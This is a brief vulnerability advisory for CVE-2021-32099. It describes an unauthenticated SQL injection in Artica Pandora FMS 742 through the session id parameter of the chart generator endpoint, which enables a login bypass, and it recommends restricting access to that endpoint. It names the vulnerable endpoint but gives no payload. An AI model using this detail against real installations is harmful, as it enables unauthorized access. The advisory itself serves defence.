CVE-2021-32099

Name of the Vulnerable Software and Affected Versions Artica Pandora FMS version 742

Description A SQL injection issue in the pandora console component allows an unauthenticated attacker to bypass login restrictions by exploiting the session id parameter in the "/include/chart generator.php" API endpoint. This vulnerability can be exploited remotely, enabling an attacker to execute arbitrary SQL code and upgrade an unprivileged session.

Recommendations For Artica Pandora FMS version 742, consider restricting access to the "/include/chart generator.php" API endpoint until a patch is available, and avoid using the session id parameter in this endpoint to minimize the risk of exploitation. At the moment, there is no information about a newer version that contains a fix for this vulnerability.